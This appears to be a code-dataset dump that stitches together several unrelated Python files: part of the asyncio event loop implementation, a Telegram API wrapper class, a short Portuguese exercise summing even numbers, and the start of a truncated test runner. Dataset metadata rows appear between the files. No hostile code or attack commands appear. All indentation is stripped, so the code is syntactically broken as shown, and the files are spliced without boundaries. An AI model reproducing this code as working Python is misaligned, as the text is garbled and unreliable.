future = tasks.ensure_future(future, loop=self)
if new_task:
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
self._stopping = True
def close(self):
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
return self._closed
def __del__(self):
if not self.is_closed():
warnings.warn(f"unclosed event loop {self!r}", ResourceWarning,
source=self)
if not self.is_running():
self.close()
def is_running(self):
return (self._thread_id is not None)
def time(self):
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor()
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except events.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
raise events.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None):
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
exceptions = []
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
if local_addr is not None:
for _, _, _, _, laddr in laddr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
exceptions.append(exc)
else:
sock.close()
sock = None
continue
if self._debug:
logger.debug("connect %r to %r", sock, address)
await self.sock_connect(sock, address)
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
'host and port was not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except events.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise events.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None):
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except Exception:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_address=_unset, reuse_port=None,
allow_broadcast=None, sock=None):
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_address=reuse_address, reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
addr_infos = collections.OrderedDict()
for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
assert isinstance(addr, tuple) and len(addr) == 2, (
'2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
if reuse_address is not _unset:
if reuse_address:
raise ValueError("Passing `reuse_address=True` is no "
"longer supported, as the usage of "
"SO_REUSEPORT in UDP poses a significant "
"security concern.")
else:
warnings.warn("The *reuse_address* parameter has been "
"deprecated as of 3.7.6 and is scheduled "
"for removal in 3.11.", DeprecationWarning,
stacklevel=2)
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
start_serving=True):
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks.gather(*fs, loop=self)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0, **kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
popen_args = (program,) + args
for arg in popen_args:
if not isinstance(arg, (str, bytes)):
raise TypeError(
f"program arguments must be a bytes or text string, "
f"not {type(arg).__name__}")
protocol = protocol_factory()
debug_log = None
if self._debug:
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
return self._exception_handler
def set_exception_handler(self, handler):
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except Exception:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except Exception as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except Exception:
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
if self._debug and timeout != 0:
t0 = self.time()
event_list = self._selector.select(timeout)
dt = self.time() - t0
if dt >= 1.0:
level = logging.INFO
else:
level = logging.DEBUG
nevent = len(event_list)
if timeout is None:
logger.log(level, 'poll took %.3f ms: %s events',
dt * 1e3, nevent)
elif nevent:
logger.log(level,
'poll %.3f ms took %.3f ms: %s events',
timeout * 1e3, dt * 1e3, nevent)
elif dt >= 1.0:
logger.log(level,
'poll %.3f ms took %.3f ms: timeout',
timeout * 1e3, dt * 1e3)
else:
event_list = self._selector.select(timeout)
self._process_events(event_list)
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
| true | true |
f7233710fba4a95cd8b296a5f05d5e35c418997d | 1,867 | py | Python | pytglib/api/functions/search_secret_messages.py | iTeam-co/pytglib | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 6 | 2019-10-30T08:57:27.000Z | 2021-02-08T14:17:43.000Z | pytglib/api/functions/search_secret_messages.py | iTeam-co/python-telegram | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 1 | 2021-08-19T05:44:10.000Z | 2021-08-19T07:14:56.000Z | pytglib/api/functions/search_secret_messages.py | iTeam-co/python-telegram | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 5 | 2019-12-04T05:30:39.000Z | 2021-05-21T18:23:32.000Z |
from ..utils import Object
class SearchSecretMessages(Object):
"""
Searches for messages in secret chats. Returns the results in reverse chronological order. For optimal performance the number of returned messages is chosen by the library
Attributes:
ID (:obj:`str`): ``SearchSecretMessages``
Args:
chat_id (:obj:`int`):
Identifier of the chat in which to searchSpecify 0 to search in all secret chats
query (:obj:`str`):
Query to search forIf empty, searchChatMessages should be used instead
from_search_id (:obj:`int`):
The identifier from the result of a previous request, use 0 to get results from the last message
limit (:obj:`int`):
The maximum number of messages to be returned; up to 100Fewer messages may be returned than specified by the limit, even if the end of the message history has not been reached
filter (:class:`telegram.api.types.SearchMessagesFilter`):
A filter for the content of messages in the search results
Returns:
FoundMessages
Raises:
:class:`telegram.Error`
"""
ID = "searchSecretMessages"
def __init__(self, chat_id, query, from_search_id, limit, filter, extra=None, **kwargs):
self.extra = extra
self.chat_id = chat_id # int
self.query = query # str
self.from_search_id = from_search_id # int
self.limit = limit # int
self.filter = filter # SearchMessagesFilter
@staticmethod
def read(q: dict, *args) -> "SearchSecretMessages":
chat_id = q.get('chat_id')
query = q.get('query')
from_search_id = q.get('from_search_id')
limit = q.get('limit')
filter = Object.read(q.get('filter'))
return SearchSecretMessages(chat_id, query, from_search_id, limit, filter)
| 38.102041 | 187 | 0.654526 |
from ..utils import Object
class SearchSecretMessages(Object):
ID = "searchSecretMessages"
def __init__(self, chat_id, query, from_search_id, limit, filter, extra=None, **kwargs):
self.extra = extra
self.chat_id = chat_id
self.query = query
self.from_search_id = from_search_id
self.limit = limit
self.filter = filter
@staticmethod
def read(q: dict, *args) -> "SearchSecretMessages":
chat_id = q.get('chat_id')
query = q.get('query')
from_search_id = q.get('from_search_id')
limit = q.get('limit')
filter = Object.read(q.get('filter'))
return SearchSecretMessages(chat_id, query, from_search_id, limit, filter)
| true | true |
f72337d82a632098716ab7ff948e4fedf29d080d | 310 | py | Python | Desafios/exerc28.py | pedronb/Exercicios-Python | 54db2ce48bbbba94a4ac25b32b3c1fd985347857 | [
"MIT"
] | null | null | null | Desafios/exerc28.py | pedronb/Exercicios-Python | 54db2ce48bbbba94a4ac25b32b3c1fd985347857 | [
"MIT"
] | null | null | null | Desafios/exerc28.py | pedronb/Exercicios-Python | 54db2ce48bbbba94a4ac25b32b3c1fd985347857 | [
"MIT"
] | null | null | null | # Exercício Python 28: Desenvolva um programa que leia seis números inteiros e mostre a soma apenas daqueles que forem pares. Se o valor digitado for ímpar, desconsidere-o.
soma = 0
for i in range(0,6):
num = int(input('Insira um número inteiro: '))
if num % 2 == 0:
soma += num
print(soma) | 28.181818 | 172 | 0.683871 |
soma = 0
for i in range(0,6):
num = int(input('Insira um número inteiro: '))
if num % 2 == 0:
soma += num
print(soma) | true | true |
f72338223fcd579b0d8eab318317428813bb0d97 | 2,216 | py | Python | tests/common/test_run/sqrt_run.py | tianjiashuo/akg | a9cbf642063fb1086a93e8bc6be6feb145689817 | [
"Apache-2.0"
] | 286 | 2020-06-23T06:40:44.000Z | 2022-03-30T01:27:49.000Z | tests/common/test_run/sqrt_run.py | tianjiashuo/akg | a9cbf642063fb1086a93e8bc6be6feb145689817 | [
"Apache-2.0"
] | 10 | 2020-07-31T03:26:59.000Z | 2021-12-27T15:00:54.000Z | tests/common/test_run/sqrt_run.py | tianjiashuo/akg | a9cbf642063fb1086a93e8bc6be6feb145689817 | [
"Apache-2.0"
] | 30 | 2020-07-17T01:04:14.000Z | 2021-12-27T14:05:19.000Z | # Copyright 2019-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import akg
import numpy as np
from akg.utils import kernel_exec as utils
from akg.ops.math import Sqrt
from tests.common.tensorio import compare_tensor
from tests.common.gen_random import random_gaussian
from akg.utils.result_analysis import target_profiling
from akg.utils.format_transform import to_tvm_nd_array
def sqrt_run(shape, dtype, attrs):
if 'tuning' in attrs.keys():
t = attrs.get("tuning", False)
kernel_name = attrs.get("kernel_name", False)
mod = utils.op_build_test(Sqrt, [shape], [dtype], kernel_name=kernel_name, attrs=attrs, tuning=t)
if t:
expect, input, output = gen_data(dtype, shape)
return mod, expect, (input, output)
else:
return mod
else:
expect, input, output = gen_data(dtype, shape)
mod = utils.op_build_test(Sqrt, [shape], [dtype], kernel_name='sqrt', attrs=attrs)
output = utils.mod_launch(mod, (input, output), expect=expect)
if attrs.get("profiling", False):
target_name = attrs["target"].split()[0]
args_list = to_tvm_nd_array([input, output], akg.tvm.context(target_name, 0))
